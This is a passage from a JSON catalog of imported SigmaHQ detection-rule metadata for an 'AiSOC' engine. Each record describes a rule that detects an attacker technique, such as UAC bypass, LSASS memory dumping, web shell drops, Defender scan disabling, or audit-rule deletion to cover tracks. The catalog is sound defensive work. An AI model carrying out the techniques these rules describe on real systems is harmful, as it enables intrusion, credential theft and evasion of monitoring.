"categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1201" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/password-policy-discovery-with-get-addefaultdomainpasswordpolicy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bbb9495b-58fc-4016-b9df-9a3a1b67ca82", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_get_addefaultdomainpasswordpolicy.yml" } }, { "id": "sigmahq-sigma-bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2", "type": "detection", "name": "NtdllPipe Like Activity Execution", "description": "Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ntdllpipe-like-activity-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_ntdllpipe_redirect.yml" } }, { "id": "sigmahq-sigma-bbf59793-6efb-4fa1-95ca-a7d288e52c88", "type": "detection", "name": "Winlogon Notify Key Logon Persistence", "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.\nWinlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1547.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/winlogon-notify-key-logon-persistence.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bbf59793-6efb-4fa1-95ca-a7d288e52c88", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_winlogon_notify_key.yml" } }, { "id": "sigmahq-sigma-bc275be9-0bec-4d77-8c8f-281a2df6710f", "type": "detection", "name": "Windows Defender Malware And PUA Scanning Disabled", "description": "Detects disabling of the Windows Defender feature of scanning for malware and other potentially unwanted software", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/windows-defender-malware-and-pua-scanning-disabled.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bc275be9-0bec-4d77-8c8f-281a2df6710f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/windefend/win_defender_malware_and_pua_scan_disabled.yml" } }, { "id": "sigmahq-sigma-bc2e25ed-b92b-4daa-b074-b502bdd1982b", "type": "detection", "name": "Local Privilege Escalation Indicator TabTip", "description": "Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1557.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/local-privilege-escalation-indicator-tabtip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bc2e25ed-b92b-4daa-b074-b502bdd1982b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/microsoft_windows_distributed_com/win_system_lpe_indicators_tabtip.yml" } }, { "id": "sigmahq-sigma-bc3a4b0c-e167-48e1-aa88-b3020950e560", "type": "detection", "name": "Remote Printing Abuse for Lateral Movement", "description": "Detects remote RPC calls to possibly abuse remote printing service via MS-RPRN / MS-PAR", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-printing-abuse-for-lateral-movement.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bc3a4b0c-e167-48e1-aa88-b3020950e560", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/rpc_firewall/rpc_firewall_printing_lateral_movement.yml" } }, { "id": "sigmahq-sigma-bc92ca75-cd42-4d61-9a37-9d5aa259c88b", "type": "detection", "name": "Win Defender Restored Quarantine File", "description": "Detects the restoration of files from the defender quarantine", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/win-defender-restored-quarantine-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bc92ca75-cd42-4d61-9a37-9d5aa259c88b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/windefend/win_defender_restored_quarantine_file.yml" } }, { "id": "sigmahq-sigma-bcfcc962-0e4a-4fd9-84bb-a833e672df3f", "type": "detection", "name": "Azure Virtual Network Modified or Deleted", "description": "Identifies when a Virtual Network is modified or deleted in Azure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-virtual-network-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bcfcc962-0e4a-4fd9-84bb-a833e672df3f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_virtual_network_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-bcfece3d-56fe-4545-9931-3b8e92927db1", "type": "detection", "name": "Winrs Local Command Execution", "description": "Detects the execution of Winrs.exe where it is used to execute commands locally.\nCommands executed this way are launched under Winrshost.exe and can represent proxy execution used for defense evasion or lateral movement.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.006", "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/winrs-local-command-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bcfece3d-56fe-4545-9931-3b8e92927db1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_winrs_local_command_execution.yml" } }, { "id": "sigmahq-sigma-bd1212e5-78da-431e-95fa-c58e3237a8e6", "type": "detection", "name": "Suspicious ASPX File Drop by Exchange", "description": "Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-aspx-file-drop-by-exchange.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bd1212e5-78da-431e-95fa-c58e3237a8e6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_exchange_webshell_drop.yml" } }, { "id": "sigmahq-sigma-bd132164-884a-48f1-aa2d-c6d646b04c69", "type": "detection", "name": "Microsoft 365 - Potential Ransomware Activity", "description": "Detects when a Microsoft Cloud App Security reported when a user uploads files to the cloud that might be infected with ransomware.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1486" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/microsoft-365-potential-ransomware-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bd132164-884a-48f1-aa2d-c6d646b04c69", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/m365/threat_management/microsoft365_potential_ransomware_activity.yml" } }, { "id": "sigmahq-sigma-bd1c6866-65fc-44b2-be51-5588fcff82b9", "type": "detection", "name": "Renamed Msdt.EXE Execution", "description": "Detects the execution of a renamed \"Msdt.exe\" binary", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-msdt-exe-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bd1c6866-65fc-44b2-be51-5588fcff82b9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_msdt.yml" } }, { "id": "sigmahq-sigma-bd33d2aa-497e-4651-9893-5c5364646595", "type": "detection", "name": "Suspicious TCP Tunnel Via PowerShell Script", "description": "Detects powershell scripts that creates sockets/listeners which could be indicative of tunneling activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1090" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-tcp-tunnel-via-powershell-script.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bd33d2aa-497e-4651-9893-5c5364646595", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_proxy_scripts.yml" } }, { "id": "sigmahq-sigma-bd3b5eaa-439d-4a42-8f35-a49f5c8a2582", "type": "detection", "name": "Remote Access Tool - Renamed MeshAgent Execution - MacOS", "description": "Detects the execution of a renamed instance of the Remote Monitoring and Management (RMM) tool, MeshAgent.\nRMM tools such as MeshAgent are commonly utilized by IT administrators for legitimate remote support and system management.\nHowever, malicious actors may exploit these tools by renaming them to bypass detection mechanisms, enabling unauthorized access and control over compromised systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1219.002", "T1036.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-renamed-meshagent-execution-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bd3b5eaa-439d-4a42-8f35-a49f5c8a2582", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_remote_access_tools_renamed_meshagent_execution.yml" } }, { "id": "sigmahq-sigma-bd5971a7-626d-46ab-8176-ed643f694f68", "type": "detection", "name": "Extracting Information with PowerShell", "description": "Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials.\nThese can be files created by users to store their own credentials, shared credential stores for a group of individuals,\nconfiguration files containing passwords for a system or service, or source code/binary files containing embedded passwords.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/extracting-information-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bd5971a7-626d-46ab-8176-ed643f694f68", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_extracting.yml" } }, { "id": "sigmahq-sigma-bd8b828d-0dca-48e1-8a63-8a58ecf2644f", "type": "detection", "name": "Group Membership Reconnaissance Via Whoami.EXE", "description": "Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/group-membership-reconnaissance-via-whoami-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bd8b828d-0dca-48e1-8a63-8a58ecf2644f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_whoami_groups_discovery.yml" } }, { "id": "sigmahq-sigma-bdc64095-d59a-42a2-8588-71fd9c9d9abc", "type": "detection", "name": "Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded", "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-unsigned-dbghelp-dbgcore-dll-loaded.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bdc64095-d59a-42a2-8588-71fd9c9d9abc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_dll_dbghelp_dbgcore_unsigned_load.yml" } }, { "id": "sigmahq-sigma-bdd8157d-8e85-4397-bb82-f06cc9c71dbb", "type": "detection", "name": "UAC Bypass Using IEInstal - File", "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-using-ieinstal-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bdd8157d-8e85-4397-bb82-f06cc9c71dbb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_uac_bypass_ieinstal.yml" } }, { "id": "sigmahq-sigma-bde30855-5c53-4c18-ae90-1ff79ebc9578", "type": "detection", "name": "Okta User Session Start Via An Anonymising Proxy Service", "description": "Detects when an Okta user session starts where the user is behind an anonymising proxy service.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.identity" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/okta-user-session-start-via-an-anonymising-proxy-service.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bde30855-5c53-4c18-ae90-1ff79ebc9578", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/identity/okta/okta_user_session_start_via_anonymised_proxy.yml" } }, { "id": "sigmahq-sigma-bde47d4b-9987-405c-94c7-b080410e8ea7", "type": "detection", "name": "Clearing Windows Console History", "description": "Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1070", "T1070.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/clearing-windows-console-history.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bde47d4b-9987-405c-94c7-b080410e8ea7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_clearing_windows_console_history.yml" } }, { "id": "sigmahq-sigma-bdeb2cff-af74-4094-8426-724dc937f20a", "type": "detection", "name": "PowerShell Script Change Permission Via Set-Acl", "description": "Detects PowerShell execution to set the ACL of a file or a folder", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-script-change-permission-via-set-acl.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bdeb2cff-af74-4094-8426-724dc937f20a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_set_acl.yml" } }, { "id": "sigmahq-sigma-bdeeabc9-ff2a-4a51-be59-bb253aac7891", "type": "detection", "name": "PUA - Wsudo Suspicious Execution", "description": "Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-wsudo-suspicious-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bdeeabc9-ff2a-4a51-be59-bb253aac7891", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_wsudo_susp_execution.yml" } }, { "id": "sigmahq-sigma-be2e3a5c-9cc7-4d02-842a-68e9cb26ec49", "type": "detection", "name": "JAMF MDM Execution", "description": "Detects execution of the \"jamf\" binary to create user accounts and run commands. For example, the binary can be abused by attackers on the system in order to bypass security controls or remove application control polices.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/jamf-mdm-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "be2e3a5c-9cc7-4d02-842a-68e9cb26ec49", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_jamf_usage.yml" } }, { "id": "sigmahq-sigma-be344333-921d-4c4d-8bb8-e584cf584780", "type": "detection", "name": "Potentially Suspicious Event Viewer Child Process", "description": "Detects uncommon or suspicious child processes of \"eventvwr.exe\" which might indicate a UAC bypass attempt", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-event-viewer-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "be344333-921d-4c4d-8bb8-e584cf584780", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_eventvwr_susp_child_process.yml" } }, { "id": "sigmahq-sigma-be4d9c86-d702-4030-b52e-c7859110e5e8", "type": "detection", "name": "Activity From Anonymous IP Address", "description": "Identifies that users were active from an IP address that has been identified as an anonymous proxy IP address.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/activity-from-anonymous-ip-address.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "be4d9c86-d702-4030-b52e-c7859110e5e8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/identity_protection/azure_identity_protection_anonymous_ip_activity.yml" } }, { "id": "sigmahq-sigma-be58d2e2-06c8-4f58-b666-b99f6dc3b6cd", "type": "detection", "name": "Suspicious Process Masquerading As SvcHost.EXE", "description": "Detects a suspicious process that is masquerading as the legitimate \"svchost.exe\" by naming its binary \"svchost.exe\" and executing from an uncommon location.\nAdversaries often disguise their malicious binaries by naming them after legitimate system processes like \"svchost.exe\" to evade detection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-process-masquerading-as-svchost-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "be58d2e2-06c8-4f58-b666-b99f6dc3b6cd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_svchost_masqueraded_execution.yml" } }, { "id": "sigmahq-sigma-beaa66d6-aa1b-4e3c-80f5-e0145369bfaf", "type": "detection", "name": "Potentially Suspicious EventLog Recon Activity Using Log Query Utilities", "description": "Detects execution of different log query utilities and commands to search and dump the content of specific event logs or look for specific event IDs.\nThis technique is used by threat actors in order to extract sensitive information from events logs such as usernames, IP addresses, hostnames, etc.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552", "T1087" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-eventlog-recon-activity-using-log-query-utilities.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "beaa66d6-aa1b-4e3c-80f5-e0145369bfaf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_eventlog_content_recon.yml" } }, { "id": "sigmahq-sigma-bed26dea-4525-47f4-b24a-76e30e44ffb0", "type": "detection", "name": "Audit Rules Deleted Via Auditctl", "description": "Detects the execution of 'auditctl' with the '-D' command line parameter, which deletes all configured audit rules and watches on Linux systems.\nThis technique is commonly used by attackers to disable audit logging and cover their tracks by removing monitoring capabilities.\nRemoval of audit rules can significantly impair detection of malicious activities on the affected system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/audit-rules-deleted-via-auditctl.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bed26dea-4525-47f4-b24a-76e30e44ffb0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_auditctl_clear_rules.yml" } }, { "id": "sigmahq-sigma-bed2a484-9348-4143-8a8a-b801c979301c", "type": "detection", "name": "Webshell Detection With Command Line Keywords", "description": "Detects certain command line parameters often used during reconnaissance activity via web shells", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1505.003", "T1018", "T1033", "T1087" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/webshell-detection-with-command-line-keywords.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bed2a484-9348-4143-8a8a-b801c979301c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_webshell_recon_commands_and_processes.yml" } }, { "id": "sigmahq-sigma-bed978f8-7f3a-432b-82c5-9286a9b3031a", "type": "detection", "name": "Shell Invocation via Env Command - Linux", "description": "Detects the use of the env command to invoke a shell. This may indicate an attempt to bypass restricted environments, escalate privileges, or execute arbitrary commands.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/shell-invocation-via-env-command-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bed978f8-7f3a-432b-82c5-9286a9b3031a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_env_shell_invocation.yml" } }, { "id": "sigmahq-sigma-bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c", "type": "detection", "name": "HackTool - SharpEvtMute Execution", "description": 